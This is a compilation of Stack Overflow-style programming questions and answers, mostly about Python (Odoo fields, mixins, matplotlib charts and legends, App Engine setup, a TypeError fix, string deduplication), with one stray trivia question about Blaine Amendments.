How to retrive values in Many2one field as selection field? How to retrieve values on Many2one field using OnChange ? the student should be registered in one standard and one group the standard have multi groups so i want that when i change the field standard the group field should be updated with the groups in that standard When i try to do so it gives me an error ````'Expected singleton: fci standard groups(3 4 5 6)' ```` I am trying that when i change the standard field the group field will be updated to select only groups in this standard Here is my fields ````'standard_id': fields many2one('fci standard' string='Standard' required=True) 'group_id': fields many2one('fci standard groups' string='Standard Group') ```` Here is my function ````def on_change_standard(self cr uid ids standard_id context=None): val = {} if not standard_id: return {} student_obj = self pool get('fci standard') student_data = student_obj browse(cr uid standard_id context=context) val update({'group_id': student_data groups_ids id}) return {'value': val} ```` and here is my xml ````<field name="standard_id" on_change="on_change_standard(standard_id)" widget="selection"/&gt; <field name="group_id" widget="selection"/&gt; ````
No need to write an onchange method for that; you can achieve it by applying a domain to the field. Try the following:
````
<field name="standard_id" widget="selection"/>
<field name="group_id" widget="selection" domain="[('standard_id', '=', standard_id)]"/>
````
Add features to all child classes in python module I would like to update some parent class in a python module to add a feature to all children classes The module is installed via `pip` If I can modify the parent class I just add methods to it But I should not edit installed modules (following my previous <a href="http://stackoverflow com/questions/35909158/manage-python-modules-repeatedly-updated-in-both-local-and-original-repository">discussion</a>) How can I add a feature to all children classes inside a python package without editing files inside pip package directories? One alternative is using <a href="http://stackoverflow com/questions/3765222/monkey-patch-python-class">monkeypatching</a> but seems too tricky <h3>Update</h3> Concrete situation is that I would like to add common method to `Child1` and `Child2` but can not edit Parent because it is a class of a `pip` package ````class Parent: class Child1(Parent): class Child2(Parent): ````
````class Parent: class Mixin: def common_method (self ): class Child1 (Parent Mixin): class Child2 (Parent Mixin): ```` OR ````class Parent: class Augmented (Parent): def common_method (self ): class Child1 (Augmented): class Child2 (Augmented): ````
Looping and Naming Variables in Python Bar Chart I am using matplotlib in Python to create a stacked bar chart showing order volume over the course of the day by hour versus a calendar equivalent day last year I have already arranged an array that includes today's and last year's order volume: ````allorders=[(23 28) (15 7) (15 5) (8 9) (4 2) (5 3) (4 6) (8 10) (28 24) (45 46) (55 65) (0 74) (0 64) (0 58) (0 62) (0 62) (0 42) (0 43) (0 38) (0 39) (0 32) (0 40) (0 41) (0 16)] ```` For stacked bars you would normally use the following syntax: ````import matplotlib pyplot as plt import numpy as np n=2 ind = np arange(n) width = 0 35 plt ylabel('Orders') plt xticks(ind+width/2 ('Today' 'Last Year on Calendar Equivalent')) plt yticks(np arange(0 plottotal 10)) p1= plt bar(ind allorders[0] width color='#000099') p2= plt bar(ind allorders[1] width color='#000099' bottom=allorders[0]) ```` however this can be daunting with large amount of stacked charts Therefore I am trying to create a loop to go through the 'allorders' array and stack them via: ```` for i in allorders: if i=0: p1=plt bar(ind allorders[i] width color='#000099') bottomcounter=allorders[i] else: 'p+i' = plt bar(ind allorders[i] width color='r' bottom=bottomcounter) bottomcounter=bottomcounter+allorders[i] ```` but I get all sorts of errors including that the clause 'if i=0' has invalid syntax and that 'p+i'cannot be used to auto-name variables So SO wizards: 1) how do you name new variables automatically in a loop (so when i=0 the variable is named p0 when i=1 the variable is named p1 etc ) 2) what is wrong with including the 'if i=0' clause? Since I am new to Python (coming from R and Stata) please treat me like an infant with step-by-step code if you can! Thanks!
To start with, you need to read and understand the official <a href="http://docs.python.org/2/tutorial/" rel="nofollow">tutorial</a>. Second, to fix your code:
````
import itertools
import matplotlib.pyplot as plt

allorders = [(23, 28), (15, 7), (15, 5), (8, 9), (4, 2), (5, 3), (4, 6), (8, 10),
             (28, 24), (45, 46), (55, 65), (0, 74), (0, 64), (0, 58), (0, 62),
             (0, 62), (0, 42), (0, 43), (0, 38), (0, 39), (0, 32), (0, 40),
             (0, 41), (0, 16)]
width = 0.35
colors = ['k', 'r', 'b']

plts = []
for i, order in enumerate(allorders):
    bottom_counter = 0
    loc_plts = []
    # stack the values of each tuple on top of each other, cycling through the colours
    for o, c in zip(order, itertools.cycle(colors)):
        tmp_plt = plt.bar(i, o, width, color=c, bottom=bottom_counter)
        loc_plts.append(tmp_plt)
        bottom_counter += o
    plts.append(loc_plts)
plt.show()
````
dev_appserver py does nothing Currently I am new to appengine with python and now I am following this tutorial <a href="https://cloud google com/appengine/docs/python/gettingstartedpython27/creating-guestbook#objectives" rel="nofollow">https://cloud google com/appengine/docs/python/gettingstartedpython27/creating-guestbook#objectives</a> Somehow when I run dev_appserver py / as stated in the tutorial it just does nothing <a href="http://i stack imgur com/tiBxC png" rel="nofollow"><img src="http://i stack imgur com/tiBxC png" alt="enter image description here"></a> And I already have my environment variables set up also <a href="http://i stack imgur com/xi6Vb png" rel="nofollow"><img src="http://i stack imgur com/xi6Vb png" alt="enter image description here"></a> Am I missing something? I use windows by the way
I solved it on my own, guys. I was using Git Bash; I switched to cmd and removed the trailing slash from the command, and it worked.
matplotlib legend background color Is there while `rcParams['legend frameon'] = 'False'` a simple way to fill the legend area background with a given colour More specifically I would like the grid not to be seen on the legend area because it disturbs the text reading The keyword `framealpha` sounds like what I need but it does not change anything ````import matplotlib as mpl import matplotlib pyplot as plt mpl rcParams['legend frameon'] = 'False' plt plot(range(5) label = you"line") plt grid(True) plt legend(loc = best) plt show() ```` I have also tried: ````legend = plt legend(frameon = 1) frame = legend get_frame() frame set_color('white') ```` but then I need to ask how can I change the background colour while keeping the frame on? Sometimes I want it ON with a background colour other than white And also is there a way of changing the colour of the frame? With the above code I was expecting to change the colour of the frame only not the background
You can set the edge color and the face color separately like this: ````frame set_facecolor('green') frame set_edgecolor('red') ```` There is more information under FancyBboxPatch <a href="http://matplotlib org/api/artist_api html">here</a>
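Putting the answer together with the example from the question, a small self-contained sketch (the colours and the alpha value are arbitrary choices):
````
import matplotlib.pyplot as plt

plt.plot(range(5), label="line")
plt.grid(True)

legend = plt.legend(loc='best', frameon=True)   # keep the frame on
frame = legend.get_frame()
frame.set_facecolor('lightgrey')   # background colour of the legend box
frame.set_edgecolor('red')         # colour of the frame border itself
frame.set_alpha(1.0)               # fully opaque, so the grid does not show through

plt.show()
````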
What are state constitutional amendments relating to separation of church and state known as?
Blaine Amendments
TypeError: unsupported operand type(s) for *: 'int' and 'function' Not seeing why and which one is a function I cannot figure out why I am getting an error with having an int and a function multiplying ````File "E:/Fundamentals of Programming/Programs/polygon_area py" line 23 in polygon_area area = (num_sides * side_length * side_length) / \ TypeError: unsupported operand type(s) for *: 'int' and 'function' ```` Code: ````#this program computes #the area of polygons import math def main(): get_side_length() side_length = get_side_length report(side_length) def report(side_length): print('side length \t number of sides \t area') for i in range(3 10): num_sides = i polygon_area(num_sides side_length) area = polygon_area print(side_length '\t' num_sides '\t' area) def polygon_area(num_sides side_length): area = (num_sides * side_length * side_length) / \ (4 * math tan(math pi / num_sides)) return area def get_side_length(): int(input('Input the length of a side ')) return get_side_length #start program main() ````
Sorry for not reading your code carefully the first time. The key point is that a function has to `return` its result: in `get_side_length`, for example, the integer read from the user should be returned, and in `report` you need to capture what `polygon_area` returns. I have changed your code so it should work now:
````
#this program computes
#the area of polygons
import math

def main():
    side_length = get_side_length()   # get_side_length returns an integer and assigns it to side_length
    report(side_length)

def report(side_length):
    print('side length \t number of sides \t area')
    for i in range(3, 10):
        num_sides = i
        area = polygon_area(num_sides, side_length)   # polygon_area returns a number representing the area
        print(side_length, '\t', num_sides, '\t', area)

def polygon_area(num_sides, side_length):
    area = (num_sides * side_length * side_length) / \
           (4 * math.tan(math.pi / num_sides))
    return area

def get_side_length():
    return int(input('Input the length of a side '))   # convert the input to an integer and return it

#start program
main()
````
Remove repeating spaces manually in a string I have a question about a certain piece of code I was doing an exercise in python about strings I had come up with the correct logic but for some reason the output inside the for loop is not returning correctly Instead the global value gets returned I am not too familiar with Python but is there some way to fix this? ````def song_decoder(song): global Ret Ret = "" Ret = song replace("WUB" " ") Ret = Ret strip() Ret = "1" space = False for i in range(0 len(Ret)): if Ret[i] == "1": Ret = Ret[:i] break elif Ret[i] == " ": if space is False: space = True else: if i+1 == len(Ret): Ret = Ret[:i] else: Ret = Ret[:i] Ret[(i+1):] else: space = False return Ret ```` Test code: ````def test_song_decoder(self): self assertEquals(song_decoder("AWUBBWUBC") "A B C" "WUB should be replaced by 1 space") self assertEquals(song_decoder("AWUBWUBWUBBWUBWUBWUBC") "A B C" "multiples WUB should be replaced by only 1 space") self assertEquals(song_decoder("WUBAWUBBWUBCWUB") "A B C" "heading or trailing spaces should be removed") ```` The second test fails and `'A B C'` is returned instead
First of all, there is no need for you to make `Ret` global here, so you should remove that line. Second, there is one test missing which will give you another hint:
````
>>> song_decoder("AWUBBWUBC")
'A B C'
>>> song_decoder("AWUBWUBBWUBWUBC")
'A B C'
>>> song_decoder("AWUBWUBWUBBWUBWUBWUBC")
'A  B  C'
````
As you can see, two `WUB`s are correctly replaced by only one space. The problem appears when there are three. This should give you a hint that the space detection doesn't work correctly after you have made a replacement.

The reason for this is actually rather simple:
````
# you iterate over the *initial* length of Ret
for i in range(0, len(Ret)):
    ...
    elif Ret[i] == " ":
        if space is False:
            space = True
        else:
            # when you hit a space and you have seen a space directly
            # before, you check the next index …
            if i + 1 == len(Ret):
                Ret = Ret[:i]
            else:
                # … and remove the character at index `i` (the second space)
                Ret = Ret[:i] + Ret[(i+1):]
    # now, at the end of the loop, `i` is incremented to `i + 1`,
    # although you have already removed the character at index `i`,
    # so the character you would have to check next now lives at
    # index `i` and is never looked at
````
So the result is that you skip over the character that comes directly after the second space (which you remove). That makes it impossible to detect three spaces in a row this way, because you always skip the third one.

In general it's a very bad idea to iterate over something that you modify while doing so. In your case you are iterating over the original length of the string, but the string keeps getting shorter, so you really should avoid doing that. Instead of iterating over (and mutating) `Ret`, iterate over the original string, which stays constant:
````
def song_decoder(song):
    # replace the WUBs and strip leading/trailing spaces
    song = song.replace("WUB", " ").strip()

    ret = ''
    space = False
    # instead of iterating over the length, just iterate over
    # the characters of the string
    for c in song:
        # check for spaces
        if c == " ":
            # space is a boolean, so don't compare it against booleans
            if not space:
                space = True
            else:
                # we saw a space directly before this one, so skip it
                continue
        else:
            space = False
        # if we got here, we did not skip the character, so include it
        ret += c
    return ret
````